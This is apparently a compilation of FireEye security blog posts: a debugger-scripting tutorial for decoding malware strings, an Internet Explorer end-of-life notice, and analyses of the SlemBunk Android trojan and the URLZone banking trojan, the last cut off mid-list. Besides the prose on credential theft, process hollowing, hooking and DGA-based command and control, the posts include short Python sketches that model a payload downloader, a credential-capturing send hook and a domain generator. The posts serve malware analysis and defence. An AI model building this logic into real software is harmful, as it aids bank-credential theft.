
FLARE Script Series: Automating Obfuscated String Decoding

Introduction

We are expanding our script series beyond IDA Pro. This post extends the FireEye Labs Advanced Reverse Engineering (FLARE) script series to an invaluable tool for the reverse engineer – the debugger. Just like IDA Pro, debuggers have scripting interfaces. For example, OllyDbg uses an asm-like scripting language, the Immunity debugger contains a Python interface, and Windbg has its own language. None of these options is ideal for rapidly creating string decoding debugger scripts: both Immunity and OllyDbg only support 32-bit applications, and Windbg’s scripting language is specific to Windbg and, therefore, not as well known. The pykd project was created to interface between Python and Windbg to allow debugger scripts to be written in Python. Because malware reverse engineers love Python, we built our debugger scripting library on top of pykd for Windbg.

Here we release a library we call flare-dbg. This library provides several utility classes and functions to rapidly develop scripts to automate debugging tasks within Windbg. Stay tuned for future blog posts that will describe additional uses for debugger scripts!

String Decoding

Malware authors like to hide the intent of their software by obfuscating its strings. Being able to deobfuscate those strings quickly makes it much easier to figure out what the malware is doing.

As stated in Practical Malware Analysis, there are generally two approaches to deobfuscating strings: self-decoding and manual programming. The self-decoding approach lets the malware decode its own strings. Manual programming requires the reverse engineer to reprogram the decoding function logic. A subset of the self-decoding approach is emulation, where the execution of each assembly instruction is emulated. Unfortunately, library calls must be emulated as well, and emulating every library call is difficult and may produce inaccurate results. In contrast, a debugger is attached to the actual running process, so all the library functions can be run without issue. Each of these approaches has its place, but this post teaches a way to use debugger scripting to automatically self-decode all obfuscated strings.
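As a concrete illustration of the manual-programming approach, suppose a sample used a simple rolling XOR scheme (a hypothetical cipher invented for this example, not taken from any real sample); the analyst would re-implement the recovered logic in Python:

```python
def decode_string(encoded, key=0x5A):
    # Hypothetical decoder: XOR each byte with a rolling one-byte key,
    # standing in for whatever logic was recovered from the disassembly.
    out = bytearray()
    for b in encoded:
        out.append(b ^ key)
        key = (key + 1) & 0xFF
    return out.decode("ascii", errors="replace")

# The cipher is symmetric, so we can derive a sample input to test with:
plain = "http://example.com/"
enc = bytes(b ^ ((0x5A + i) & 0xFF) for i, b in enumerate(plain.encode()))
print(decode_string(enc))  # -> http://example.com/
```

The drawback is that this reimplementation must be redone for every new decoding routine, which is exactly the cost the debugger-scripting approach avoids.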

Challenge

To decode all obfuscated strings, we need to find the following: the string decoder function, each location where it is called, and the arguments to each of those calls. We then need to run the function and read out the result. The challenge is to do this in a semi-automated way.

Approach

The first task is to find the string decoder function and get a basic understanding of the inputs and outputs of the function. The next task is to identify each time the string decoder function is called and all of the arguments to each call. Without using IDA, a handy Python project for binary analysis is Vivisect. Vivisect contains several heuristics for identifying functions and cross-references. Additionally, Vivisect can emulate and disassemble a series of opcodes, which can help us identify function arguments. If you haven’t already, be sure to check out the FLARE scripting series post on tracking function arguments using emulation, which also uses Vivisect.

Introducing flare-dbg

The FLARE team is introducing a Python project, flare-dbg, that runs on top of pykd. Its goal is to make Windbg scripting easy. The heart of the flare-dbg project lies in the DebugUtils class, which contains several functions to handle:

  • Memory and register manipulation
  • Stack operations
  • Debugger execution
  • Breakpoints
  • Function calling

In addition to the basic debugger utility functions, the DebugUtils class uses Vivisect to handle the binary analysis portion.

Example

I wrote a simple piece of malware that hides strings by encoding them. Figure 1 shows an HTTP User-Agent string being decoded by a function I named string_decoder.

Figure 1: String decoder function reference in IDA Pro

After a cursory look at the string_decoder function, the arguments are identified as an offset to an encoded string of bytes, an output address, and a length. The function can be described by a C prototype along the lines of void string_decoder(char *encoded_str, char *out_buf, int len), where the parameter names are our own.

Now that we have a basic understanding of the string_decoder function, we test decoding using Windbg and flare-dbg. We begin by starting the process with Windbg and executing until the program’s entry point. Next, we start a Python interactive shell within Windbg using pykd and import flaredbg.

Next, we create a DebugUtils object, which contains the functions we need to control the debugger.

We then allocate 0x3A bytes of memory for the output string, use the newly allocated address as the second parameter, and set up the remaining arguments.

Finally, we call the string_decoder function at virtual address 0x401000, and read the output string buffer.

After proving we can decode a string with flare-dbg, let’s automate all calls to the string_decoder function. An example debugger script is shown in Figure 2. The full script is available in the examples directory of the GitHub repository.

Figure 2. Example basic debugger script

Let’s break this script down. First, we identify the function virtual address of the string decoder function and create a DebugUtils object. Next, we use the DebugUtils function get_call_list to find the three push arguments for each time string_decoder is called.

Once the call_list is generated, we iterate all calling addresses and associated arguments. In this example, the output string is decoded to the stack. Because we are only executing the string decoder function and won’t have the same stack setup as the malware, we must allocate memory for the output string. We use the third parameter, the length, to specify the size of the memory allocation. Once we allocate memory for the output string, we set the newly allocated memory address as the second parameter to receive the output bytes.

Finally, we run the string_decoder function by using the DebugUtils call function and read the result from our allocated buffer. The call function sets up the stack, sets any specified register values, and executes the function. Once all strings are decoded, the final step is to get these strings back into our IDB. The utils script contains utility functions to create IDA Python scripts. In this case, we output an IDA Python script that creates comments in the IDB.

Running this debugger script produces the following output:

The output IDA Python script creates repeatable comments on all encoded string locations, as shown in Figure 3.

Figure 3. Decoded string as comment
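As a standalone illustration of that last step (our own sketch, not the actual flare-dbg utils code), a generator for such an IDA Python script could look like this, using the hypothetical address and string below:

```python
def make_ida_comment_script(decoded_strings):
    # decoded_strings maps each call's virtual address to its decoded string.
    lines = ["import idc", ""]
    for va in sorted(decoded_strings):
        # MakeRptCmt places a repeatable comment at the given address.
        lines.append("idc.MakeRptCmt(0x%08X, %r)" % (va, decoded_strings[va]))
    return "\n".join(lines) + "\n"

# Hypothetical results from a debugger run:
script = make_ida_comment_script({0x401234: "Mozilla/4.0 (compatible)"})
print(script)
```

Running the emitted script inside IDA then annotates every call site with its decoded string.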

Conclusion

Stay tuned for another debugger scripting series post that will focus on plugins! For now, head over to the flare-dbg GitHub project page to get started. The project requires pykd, winappdbg, and vivisect.


End of Life for Internet Explorer 8, 9 and 10


Microsoft has started the year with an announcement that, effective Jan. 12, 2016, support for all older versions of Internet Explorer (IE) will come to an end (known as an EoL, or End of Life). The affected versions are Internet Explorer 7, 8, 9, and 10.

What this means for users is that Microsoft will no longer release new security updates for these product versions going forward. This gives users two options: Internet Explorer 11 and Microsoft Edge, the latter of which is currently exclusive to Windows 10. If users would like to keep their browsers up to date, they will need to upgrade to either of these two options.

It should go without saying that Internet Explorer users are strongly encouraged to update to the latest version. It offers improved security with the latest security features and mitigations. Two notable mitigations introduced to the browser in 2014 are Isolated Heap and Memory Protect, which were implemented on Patch Tuesday of June and July 2014 respectively. Prior to that, Microsoft made a similar announcement about the Windows XP Operating System, wherein they issued an End of Life for XP in April 2014.

These are all steps in the right direction for the Microsoft teams because it allows for the consolidation of team efforts, resulting in a stronger focus on securing fewer versions across a smaller code base. Microsoft continues to silently enhance protections as the months go by while at the same time trimming code.

Figure 1 shows the vulnerability counts for Internet Explorer versions in 2015.

Figure 1. Internet Explorer vulnerability count for 2015 [1]

The graph above shows the total number of reported vulnerabilities affecting each version of Internet Explorer across the months of 2015. Keeping in mind that these are non-unique counts, we can observe that, for the most part, the majority of the reported vulnerabilities affected Internet Explorer 11.

Figure 2 shows the most notable in the wild (ITW) attacks exploiting Internet Explorer in 2014 and 2015.

Year    CVE              Affects
2014    CVE-2014-0322    IE 9 and 10
2014    CVE-2014-1776    IE 6 to 11
2015    CVE-2015-2419    IE 10 and 11
2015    CVE-2015-2502    IE 7 to 11
Figure 2. ITW attacks of Internet Explorer [1]

The majority of the attacks found ITW in 2014 and 2015 affected IE 11.

Figure 3 compares the count of vulnerabilities that affect Internet Explorer 11 (IE 11) to the ones that don’t.

Figure 3. IE11 vs. Non-IE11 vulnerability count [1]

Based on the information found in Figures 1, 2, and 3, most of the vulnerabilities reported in 2015 affected Internet Explorer 11. This shows that attackers, as well as researchers, are focusing considerably on Internet Explorer 11. Microsoft’s most recent move will allow the company to do the same.

It should be noted that, as of Internet Explorer 11, some features are no longer supported or are considered deprecated. These include, but are not limited to, VML and VBScript, which have been used to exploit and compromise the integrity of Internet Explorer, or leveraged to bypass ASLR/DEP in the past. This is a strong move in the right direction, as trimming the code base leads to shrinking the attack surface. This helps secure products such as Internet Explorer.

It is also worth noting that at this point no ITW attacks have been observed against Microsoft Edge, the new web browser that currently ships exclusively with Windows 10. Microsoft Edge also follows the same approach of removing unnecessary features such as ActiveX and Browser Helper Objects, as well as others.

In conclusion, after Jan. 12, 2016, users of older Internet Explorer versions will be exposed to vulnerabilities that may be exploited by malware and targeted by exploit kits. The best way to defend against this is to keep your browser up to date by upgrading to Internet Explorer 11 or using Microsoft Edge.

[1] Microsoft Security Bulletins: https://technet.microsoft.com/en-us/library/security/dn610807.aspx

The Dangers of Downloads: Securing Mobile Devices in 2016


In 2015, mobile malware attacks were on the rise; from 2014 to 2015 we saw an increase of 61% in the number of these attacks.

Malware has a clear progression path; it starts out targeting unsuspecting users who are likely to open unknown attachments or install unknown applications. The primary target? The user’s information. Think of the early Trojans that used infected machines for DDoS attacks or spam. Then the malware writers start to go after the users’ finances, identity and bank transfers. Finally, the malware morphs into targeted attacks on enterprise resources.

Mobile malware follows the same path. Early on, attackers used malicious apps to send premium SMS messages, racking up huge wireless bills for the unwary user, or getting them to install unwanted applications. Then the malware writers started to target the users’ bank credentials.

The recent SlemBunk attack is just the latest of these types of attacks. We also saw attacks in 2015 that targeted Android and, increasingly, iOS users, including the iOS XcodeGhost and iBackdoor attacks.

These mobile malware examples prove that you need a complete mobile security solution for 2016. Using an Enterprise Mobility Management (EMM) platform, like the one offered by AirWatch in conjunction with the FireEye MTP solution, is necessary to secure your mobile infrastructure.


Join us for a free webinar!

FireEye and AirWatch team up to discuss the latest mobile risks on Android
and iOS, and how you can protect your organization and employees.
Thurs, Jan. 28, 2016 (2 p.m. ET/11 a.m. PT)


SlemBunk Part II: Prolonged Attack Chain and Better-Organized Campaign

Introduction

Our follow-up investigation of a nasty Android banking malware we identified at the tail end of last year has not only revealed that the trojan is more persistent than we initially realized – thus making for a much more dangerous threat – but that it is also being used as part of an ongoing and evolving campaign.

On Wednesday, Dec. 17, 2015, FireEye published SlemBunk: An Evolving Android Trojan Family Targeting Users of Worldwide Banking Apps. The blog exposed SlemBunk – a family of Android trojan apps that attempt to steal the login credentials of mobile banking users. Those trojan apps masquerade as common, popular applications and stay incognito after running for the first time. They have the ability to phish for and harvest authentication credentials when specified banking apps are launched. In our initial investigation, we identified more than 170 SlemBunk samples that targeted users of 33 mobile banking apps, whose service regions cover three major continents: North America, Europe, and Asia Pacific.

The previous article described the technical details of SlemBunk, covering how it is composed, how it steals user credentials, and how it communicates with the command and control (CnC) server to conduct a variety of supporting functions. We also noted that drive-by downloads from porn sites were one distribution mechanism for the SlemBunk payload.

After releasing those findings, we continued to monitor the development of SlemBunk and conducted a more in-depth study. Our investigation identified a much longer attack chain (as depicted in Figure 1) than we reported in the previous article. Before the invocation of the actual SlemBunk payload, up to three apps have to land on the device in order to fire the last deadly shot. This makes it much harder for analysts to trace the observed attacks back to their actual origin, and thus the malware can have a more persistent existence on the victim’s device.

Figure 1. Prolonged attack chain of latest SlemBunk development

In this follow-up post, we present the technical details of this prolonged attack chain:

  • A drive-by download starts the prolonged attack chain and puts the first app onto the victim’s device. We call this app the SlemBunk dropper.
  • The dropper optionally uses a packer to hide its own payload, and thus runtime unpacking is needed to recover the second app: the SlemBunk downloader, which conducts in-app downloading to grab the actual malicious payload.
  • The downloader app queries a customized CnC server for the SlemBunk payload, the final app in the attack chain, and this app fires the last shot. The details of how the SlemBunk payload works are described in our previous blog.

Our additional research also identified the URLs of a few CnC servers for this campaign. We looked into the communication protocol between the SlemBunk apps and the CnC server by studying relevant code and monitoring the exchanged messages. This revealed that SlemBunk is developing into a more organized campaign with highly customized CnC servers, including the use of what appears to be an administration panel to manage the campaigns. The registration records of the relevant domains suggest that this campaign activity is very recent, still ongoing, and possibly evolving into different forms. In this follow-up article, we present our analysis of this data as well.

Drive-by Download: to Fetch SlemBunk Dropper

Early SlemBunk samples mainly distributed themselves by imitating popular apps, such as porn apps or essential tools. Drive-by downloads, however, can make it easier to reach more victims. The dropper is the first app to land on the victim’s device, and it starts the prolonged attack chain presented in this article.

Figure 2 shows an example website that provides porn content, as seen from the content hosted on the webpage. However, the website also serves additional hidden content. When a user accesses the website, a script embedded in the page first detects the type of device accessing the site. If it is an Android device, and the version of Android is greater than 2 and less than 6.4 (as seen in the JavaScript code inside the lower box), the apkDownload function will be called. After the app is downloaded, the website also prompts its users to “Please Update Flash on Your Device” (as seen in the pop-up window and the JavaScript code in the upper box). Unwary users, more eager to see the video than to consider what this app really is, will readily accept what the website says and happily install the app that claims to be a Flash update. Instead, malware lands on the victim’s device.

Figure 2. Porn site supports drive-by download of SlemBunk dropper

Usually, the app landing on the victim’s device is only a dropper for the actual malicious SlemBunk payload. By itself, the dropper can’t do much to compromise the user. To fire the last deadly shot, it has to go through a few other steps to achieve its surreptitious purpose. The next sections detail how the malicious payload finally lands on the victim’s device and enables theft of their banking credentials.

SlemBunk Dropper: to Unpack the SlemBunk Downloader

The downloader is the second app in the attack chain. Its main goal is to download the actual SlemBunk payload, which will be used to steal banking credentials from victims. However, the downloading logic is not easy to identify. When looking into the dropper app downloaded from the above porn site, we found that there is only one class, named “Application,” inside the app’s code. The app is intentionally obfuscated: only a few Android API calls can be identified, most of which are Android’s reflection API calls used for dynamically loaded code. Figure 3 shows a snippet of the code to be invoked when the dropper is started.

Figure 3. Code to recover the in-app downloading logic

Line 3 shows that the only class in the dropper app extends an Android framework class named "android[.]app[.]Application". This extension matters because a class extending Application is started before any other component of the app, and its overridden attachBaseContext method executes as soon as the application process is created. The SlemBunk dropper uses this trick to recover the in-app downloading logic.

The original in-app downloading logic is encoded into a 9-kilobyte Unicode string (in line 13). The code from lines 14 to 41 will decode this Unicode string, and write this code into a new app file, whose path is "/data/data/app_name/dex/new[.]apk". Runtime instrumentation shows that the content of variable v3 after the while loop (lines 19 to 26) will be the content of this apk file. The reflective write call will write the content of v3 into the particular path at line 42. The reflective method calls (from lines 29 to 39) are all file-relevant operations used to prepare for the writing operation at line 42. Table 1 shows the strings as encoded in the original code and as recovered at runtime.

Position     Obfuscated string (classes/methods/parameters)  ->  Actual string
Line 29      Class: ⴌ?질ꅁ㑝戡뿫唙ቄᥣ豰芒머ㆳ  ->  java.lang.String
Line 30      Class: ⴌ?질ꅁ㑘戯뾫唸ቻᥲ  ->  java.io.File
Lines 32-34  Class: ⴇ짚ꅒॏ㑘戤뾫唝?ቹᥣ豧芕먢ㇺ䗩䶠楅됳꺿쥐  ->  android.content.Context
             Method: ⴁ짊ꅤ  ->  getDir
             Parameter: ⴂ  ->  dex
Line 36      Parameter: ⴈ짉ꄎ㑁戫  ->  new.apk
Line 38      Class: ⴌ?질ꅁ㑘戯뾫唸ቻᥲ豍芎먢ㆤ䗟?楸됳꺨쥍?ጢ  ->  java.io.FileOutputStream
Line 41      Method: ⴑ짗ꅔ  ->  write

Table 1. Reflective method calls to decrypt the in-app downloading logic

After substituting the actual readable strings into these reflective calls, it is easy to see that the logic here writes the content of v3 (the decoded in-app downloading logic) into the file at "/data/data/app_name/dex/new[.]apk".
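The decode loop itself (lines 19 to 26 in Figure 3) is sample-specific and not reproduced here; as a purely illustrative analogue, a transform of this general shape (the XOR-and-split scheme below is our own invention, not SlemBunk's actual algorithm) could recover APK bytes from an embedded Unicode string:

```python
def unpack_blob(blob, key=0x1F2E):
    # Illustrative analogue only: each UTF-16 code unit carries two payload
    # bytes, obfuscated with a XOR key. The dropper would then write the
    # result to /data/data/app_name/dex/new.apk and load it reflectively.
    out = bytearray()
    for ch in blob:
        v = ord(ch) ^ key
        out += bytes((v & 0xFF, (v >> 8) & 0xFF))
    return bytes(out)
```

The key point is only the shape of the technique: decode the blob in memory, write it to a file, then load it via DexFile.loadDex.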

In the same way, we decrypted the logic of the code shown in Figure 4, which finishes the task of the SlemBunk dropper. This part of the code uses the loadDex method of class "dalvik[.]system[.]DexFile" to dynamically load the newly generated app, delete it from storage, and then call into its entry point.

Figure 4. Dropper code snippet to load the downloader and transfer control

At this point, the packer has recovered the in-app downloading logic and called into its entry point. The next section will present our analysis of how the in-app downloading works.

SlemBunk Downloader: to Grab the Malicious SlemBunk Payload

The first two apps, although important, do not perform any of the intended malicious actions. Instead, they mainly serve as conduits that deliver the final malicious payload. They also help attackers achieve a stealthier and more persistent presence on the device. First, a longer attack chain makes it much harder for an analyst to trace the malicious actions back to their origin. Second, the SlemBunk downloader, as shown in the previous section, is deleted from storage after it is loaded, and thus exists only in memory. Third, even if the malicious SlemBunk payload were detected and removed, the more surreptitious downloader could periodically attempt to re-download the payload to the device. This section details how this downloader works.

The downloader, when invoked, first performs a device check to see if the payload is already installed and running. If not, the downloader starts a thread talking to a remote HTTP server that customizes how the payload is to be distributed. The remote server is hardcoded in the source code, as shown in line 14 in Figure 5.

Figure 5. The main thread of SlemBunk downloader (from an un-obfuscated sample)

To grab the SlemBunk payload, the downloader first tries to start the mobile network (at line 20) and wireless network (at line 26). At line 28, it calls Tools.JSON with the hard-coded URL as a parameter to start the downloading. The code in lines 34 to 42 tries to install the downloaded payload. The code at line 44 starts the newly downloaded app. The code at line 45 sends an answering message back to the server. And the code at line 46 deletes the app from storage.

Figure 6 shows the code snippet used to attempt downloading the app. First, the CnC server is contacted to get a response (at line 19), which is a JSON object. From the code, we can see that there are three parameters, as returned by the CnC server. The first one is a path for the actual place to download the SlemBunk payload (at line 22), the second is the package name for the downloaded app (at line 21), and the third parameter is the md5sum of the payload (at line 5). Interestingly, we found that the downloader incorporates a simple but effective mechanism to ensure that the correct payload is downloaded. From lines 24 to 27, it keeps attempting the downloading action until the MD5 value of the downloaded app is the same as the last parameter returned from the CnC server.

Figure 6. Communication details with the CnC server

Using a browser to access the hard-coded URL confirmed our findings. Figure 7 is a screenshot that shows an example of the returned JSON string. As shown in the red boxes, the three keys are “path”, “package” and “md5sum”, which are exactly the same as shown in lines 15 to 17 in Figure 6. The values for these keys further confirm our analysis. The first parameter gives the path to download the payload: "xxxvideotube[.]org/AdobeFlashPlayerUpdate". The second parameter is the package name of the downloaded app: “org.slempo.service”. And the third parameter is the md5sum for this app: “288AD03CC9788C0855D446E34C7284EA”.

Figure 7. The response from the CnC server
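Putting Figures 6 and 7 together, the downloader's check-and-retry logic can be sketched as follows (a simplified standalone sketch; download() stands in for the real HTTP fetch, and the payload bytes are illustrative):

```python
import hashlib
import json

def fetch_payload(cnc_response, download, max_attempts=5):
    # The CnC answers with a JSON object carrying the three keys seen in
    # Figure 7: "path", "package" and "md5sum".
    cfg = json.loads(cnc_response)
    expected_md5 = cfg["md5sum"].lower()
    for _ in range(max_attempts):
        data = download(cfg["path"])
        # Retry until the downloaded bytes hash to the expected MD5
        # (the real downloader loops until the hashes match).
        if hashlib.md5(data).hexdigest() == expected_md5:
            return cfg["package"], data
    return None

# Stubbed example mirroring the observed response fields:
payload = b"apk-bytes-for-illustration"
response = json.dumps({
    "path": "xxxvideotube[.]org/AdobeFlashPlayerUpdate",
    "package": "org.slempo.service",
    "md5sum": hashlib.md5(payload).hexdigest(),
})
print(fetch_payload(response, lambda path: payload))
```

The MD5 check is a cheap integrity mechanism, but note it also makes a corrupted or substituted payload simply fail open: the downloader just keeps retrying.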

Better-Organized Campaign?

The use of a drive-by download to distribute the SlemBunk payload and the details of the CnC server communication suggest that this campaign is well-organized and continuing to evolve. As we continued our investigation, we found other interesting facts that support this assessment. First, the administrative interface hosted on the CnC server (described below) implies that the CnC server is customizable and that the SlemBunk payload can easily adapt per the attacker’s specifications. Second, the timeline information for the domains associated with this attack showed that this campaign is very recent, still ongoing, and very likely to continue evolving into different forms. We will keep a close eye on its development.

High Customizability

Line 14 in Figure 5 shows the CnC server and the query string that the SlemBunk downloader uses to determine the payload to download. Opening the CnC server in a web browser brings us to the login page shown in Figure 8. The title of this page shows “app-setuper-admin – login page”. The text on the page, when translated into English from the original Russian, reads “authorization,” “login,” and “password.” We believe this is the administrative interface for the attacker to customize how the CnC server should feed the payload to the downloader clients. It seems that the attackers are trying to develop this into a more organized campaign. The JSON object, as returned by the CnC server (as shown in Figure 7), also strengthens this theory.

Figure 8. App setup admin UI to customize the CnC configuration

Timeline of the Drive-by Downloading Campaign

We identified three domains directly related to this drive-by downloading campaign. Domain “xxxvideotube,” registered on Aug. 28, 2015, is used to host the SlemBunk dropper and payloads. Domain “brutaltube4mobile,” registered on Nov. 22, 2015, acts as the CnC server to host the payload configuration query and also the admin panel.

Figure 9. A new CnC domain found in one SlemBunk dropper

Among the latest samples we collected, we found a domain named “f8gr8e8tg[.]com” that replaces “brutaltube4mobile” as the CnC server (as shown in Figure 9). However, this domain seems to be dormant right now, and the corresponding app also reported failure when we attempted to start the app on the device. The domain registration records show that this domain was registered on Dec. 1, 2015.

Putting the registration records of these three domains together (Figure 10), we might be able to deduce a kind of developing relationship. When the first domain, "xxxvideotube[.]org," was created on Aug. 27, 2015 (four months ago), it might have been used only for the SlemBunk payload. The SlemBunk payload app hosted at "xxxvideotube[.]org/AdobeFlashPlayerUpdate[.]apk" has no dependency on the CnC server (the second domain in Figure 10). When the second domain (the CnC server) was set up on Nov. 22, 2015 (one month ago), the SlemBunk dropper app hosted at "xxxvideotube[.]org/AdobeUpdate[.]apk" was able to use this new CnC server to download the customized payload. The last domain seems to be a new attempt from the attacker. For some reason, it is not functioning well. In summary, we believe that this campaign activity is very recent, still ongoing, and possibly evolving into different forms.

Figure 10. Registration records for SlemBunk domains

Finally, the domain “brutaltube4mobile[.]com” was registered using the email address oodookree[@]gexmails[.]com. That email address was also used to register four other domains: “brutalmobiletube[.]com,” “brutalmobiletubes[.]com,” “adobeupdate[.]org” and “australiamms[.]com”. Our initial study showed that the domain “australiamms[.]com” is used to host a CnC server for the SlemBunk campaign. The domains “adobeupdate[.]org” and “brutalmobiletube[.]com” are dedicated to another malware campaign, which will be analyzed in detail in an upcoming blog. At this time we are not sure if there is a malicious purpose behind the domain “brutalmobiletubes[.]com”.

Conclusion

SlemBunk is an evolving family of Android trojans that target mobile banking app users throughout the world. In this article, we presented the prolonged attack chain that we identified in its latest development, and the data to show that this campaign is a very recent, still ongoing effort that might develop into different forms. The FireEye mobile research team will keep a close eye on this.

URLZone Zones in on Japan


Recently we’ve seen an interesting trend: several crimeware families that were mainly active in the European region have now expanded their activity to Japan. Rovnix is one such family, as recently reported by IBM X-Force.

At the same time, we’ve seen another spam campaign break out in Japan. This campaign attempted to deliver another old banking trojan, URLZone (aka Shiotob/Bebloh), which was initially discovered in 2009. URLZone is known to be very active in the European region, especially Spain and Germany. Now we have noticed the spam group focusing on Japan.

This blog describes a URLZone spam campaign targeting Japan in December 2015. We discuss its new persistence and evasion techniques, as well as its well-known password stealing method and command and control (CnC) communication.

Spam Campaign

On Dec. 16, 2015, and Dec. 21, 2015, we saw an extensive amount of URLZone spam emails being delivered to Japanese email users. Figure 1 represents the spikes of URLZone spam activity we detected during that time.

Figure 1. Timeline of URLZone activities

URLZone spam campaigns usually target a specific region. The spam emails are crafted in the target region’s language, and are often sent from email account domains belonging to that region. This increases the chance of recipients opening the malicious attachment, especially in non-English speaking regions, as recipients are more accustomed to exchanging emails in their native language.

The email subject and content were simple and generic. The subjects were written in English and Japanese with short Japanese sentences for the body, as shown in Figure 2.

Figure 2. URLZone spam email samples

Most of the spam emails were sent from freely available web email accounts in Japan. The majority of the emails used the domains softbank.jp and yahoo.co.jp, which belong to the largest mobile carrier and the largest web portal service in Japan, respectively.

An attached ZIP archive containing URLZone binaries used a double extension to disguise the executable as a DOC or JPG file and trick recipients into opening it. For example, “scan01_doc_2015~jpeg.zip” extracts to “scan01_doc_2015~jpeg.jpeg.exe”.
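The double-extension trick relies on file managers hiding known extensions by default; a simple heuristic to flag such attachment names (our own example, not part of any FireEye tooling) is:

```python
import os

EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat"}

def has_disguised_extension(filename):
    # Flags names like "scan01_doc_2015~jpeg.jpeg.exe": an executable
    # extension hidden behind a document/image-looking inner extension.
    root, outer = os.path.splitext(filename.lower())
    _, inner = os.path.splitext(root)
    return outer in EXECUTABLE_EXTS and inner != ""

print(has_disguised_extension("scan01_doc_2015~jpeg.jpeg.exe"))  # -> True
print(has_disguised_extension("report.docx"))                    # -> False
```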

Malware Analysis

URLZone is a banking trojan. It downloads a configuration file that contains information on targeted financial institutions, and uses web injection techniques to steal a user’s banking credentials. While the basic characteristics of URLZone samples in the campaign in Japan remained the same as the previous analysis done by Arbor Networks, several new features were added to the latest URLZone sample.

Initial Infection Stage

The malware uses process hollowing (also known as process replacement) to mask its execution. It tries to hollow explorer.exe or iexplore.exe, adding “_section” as a command-line parameter to identify the process as one spawned by the malware.

The process it hollows is initially started in a suspended state. The malware then writes its malicious code to the entry point of the hollowed process. Once the necessary code is written, it resumes the suspended process, thus executing the malicious payload.

Next, the malware does one of the following:

1.     Continues to run the malicious routine in this hollowed process if the hollowed process is 64-bit or it has a window (this is for hollowed iexplore.exe).

2.     Continues the malicious routine by injecting itself into the running explorer.exe on the system.
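The branch logic above reduces to a simple predicate. The sketch below models it in Python (the parameter names are ours; the malware makes this decision from process attributes, not via a function call):

```python
def continues_in_hollowed_process(is_64bit, has_window):
    """Mirror the reported branch: stay in the hollowed process if it is
    64-bit or owns a window (the hollowed iexplore.exe case); otherwise
    inject into the running explorer.exe on the system instead."""
    return is_64bit or has_window

# A 32-bit, windowless hollow falls back to explorer.exe injection.
print(continues_in_hollowed_process(False, False))  # False
print(continues_in_hollowed_process(True, False))   # True
```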

Stolen Information

System Survey

To identify the victim system, the malware acquires the following details:

-        Computer name

-        OS major/minor version, as well as install date

-        Hollowed process name, version, and timestamp

-        IP address

-        Keyboard layout

This is sent out in a beacon POST to the CnC server as described in Arbor’s report.

Email Addresses

URLZone steals the email addresses stored in the Windows Address Book (WAB). It does so by querying the registry for both the path to wab32.dll and the WAB file name. It then uses this library to parse the WAB file and saves the harvested addresses to a randomly named value under a randomly named registry key, HKLM\SOFTWARE\<random>\<random_value>.

Web/FTP/Email Information and Credentials

The malware steals web and FTP information by injecting malicious code into programs commonly used for connectivity. It injects into each target program a routine that hooks the library the program uses to send or receive network traffic. A continuously running thread checks for the presence of these applications and injects the appropriate hooking function depending on the process name. The hooking process is described in depth here.

-        iexplore.exe – WinInet hooking

-        explorer.exe – WinInet hooking

-        myie.exe – WinInet hooking

-        firefox.exe – WinInet hooking

-        ftpte.exe – WinSock hooking

-        coreftp.exe – WinSock hooking

-        filezilla.exe – WinSock hooking

-        TOTALCMD.EXE – WinSock hooking

-        cftp.exe – WinSock hooking

-        FTPVoyager.exe – WinSock hooking

-        SmartFTP.exe – WinSock hooking

-        WinSCP.exe – WinSock hooking

-        chrome.exe – WinInet hooking

-        opera.exe – WinInet hooking

For FTP/email applications (those using WinSock hooking), it hooks three APIs exported by ws2_32.dll:

-        ws2_32.send

-        ws2_32.connect

-        ws2_32.closesocket

It monitors FTP/mail transactions through the ws2_32.connect hook, checking the connect parameters for the strings “FTP” and “MAIL”; the FTP/mail server address and connection handle are captured from this hook. The ws2_32.send hook captures the authentication request by checking for the strings “USER” and “PASS” in order to steal the user’s credentials.
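The send-hook logic amounts to a simple filter over outgoing buffers. The sketch below models it in Python as a pure function (real hooks run inline inside the target process; this only illustrates the string checks described above):

```python
def classify_ws2_send(buffer: bytes):
    """Classify an intercepted send() buffer the way the reported hook
    does: look for FTP/SMTP authentication commands and capture the
    credential that follows."""
    text = buffer.decode("latin-1", errors="replace").upper()
    if text.startswith("USER "):
        return ("username", buffer[5:].strip())
    if text.startswith("PASS "):
        return ("password", buffer[5:].strip())
    return None  # not an authentication command; ignore

print(classify_ws2_send(b"USER alice\r\n"))    # ('username', b'alice')
print(classify_ws2_send(b"RETR file.txt\r\n"))  # None
```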

For web applications, the malware monitors HTTP/S sessions via the WinInet API hooks shown in the appendix.

These hooks look for strings specified in the malware’s configuration file, strings that target data belonging to financial institutions. If a match is found, the malware sends the captured information to its CnC server.

Command and Control

URLZone uses a Domain Generation Algorithm (DGA), as noted in other reports. The initial CnC URL starts off as a hard-coded encrypted string within the malware body. If the hard-coded URL doesn’t work, the malware uses the DGA to find a working one.

The malware checks for Internet connectivity by first connecting to google.com. It then checks, via an SSLv3 handshake, whether each generated URL responds with the expected certificate, repeating until a valid URL is found.

The DGA takes in the previous URL as a seed to generate other domains.
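The report does not reproduce URLZone's exact DGA, but the seed-chaining idea (each resolved URL seeds the next candidate) can be illustrated with a generic hash-based generator. The algorithm below is purely illustrative and is not URLZone's:

```python
import hashlib

def next_domain(previous_domain: str, tld: str = ".com") -> str:
    """Derive the next candidate domain deterministically from the
    previous one, illustrating a DGA where each URL seeds its successor."""
    digest = hashlib.md5(previous_domain.encode()).hexdigest()
    # Map hex digits to lowercase letters to produce a plausible label.
    label = "".join(chr(ord("a") + int(c, 16) % 26) for c in digest[:12])
    return label + tld

d1 = next_domain("jackkk.com")
d2 = next_domain(d1)
print(d1, d2)  # a deterministic chain of candidate domains
```

Because the chain is deterministic, a defender who recovers the seeding scheme can pre-compute and sinkhole upcoming domains.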

Persistence Mechanism

Unlike many other banking trojans, URLZone uses a clever persistence mechanism and clears its registry configuration only upon logoff, reboot, and shutdown.

It does this using a Window Procedure that monitors window messages for WM_QUERYENDSESSION.

Figure 3 shows a subroutine of the Windows Procedure.

The persistence mechanism and registry clearing is done using the following method:

1.     The malware creates a copy of itself in %ProgramFiles% on Windows XP, or %AppData% on Windows Vista and later, using a filename randomly generated from a given list of strings. We’ll call this %dropfilepath%.

2.     It registers a Window Procedure to monitor the window messages.

3.     The Window Procedure checks the window messages coming into the system and waits for a WM_QUERYENDSESSION message to execute its routine, as described in Figure 3.

Figure 3. Monitoring system shutdowns

If the Window Procedure catches a WM_QUERYENDSESSION window message, it performs the following actions:

a.    Delete the random registry key HKLM\SOFTWARE\<random>, which contains the stolen email addresses and the interprocess configuration of the injected routines.

